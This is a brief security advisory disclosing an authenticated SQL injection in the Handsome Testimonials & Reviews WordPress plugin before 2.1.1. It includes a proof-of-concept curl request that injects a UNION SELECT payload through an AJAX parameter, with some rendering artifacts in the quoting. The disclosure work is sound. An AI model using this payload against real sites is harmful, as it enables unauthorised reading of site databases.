Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection

The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.

PoC

curl -i -s -k -X $‘POST’ \ -H $‘X-Requested-With: XMLHttpRequest’ -H $‘User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36’ -H $‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’ -H $‘Origin: https://example.com’ \ -b $‘[any authenticated user]’ \ --data-binary $‘action=hndtst_previewShortcodeInstance&hndtst;_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -’ \ $‘https://example.com/wp-admin/admin-ajax.php’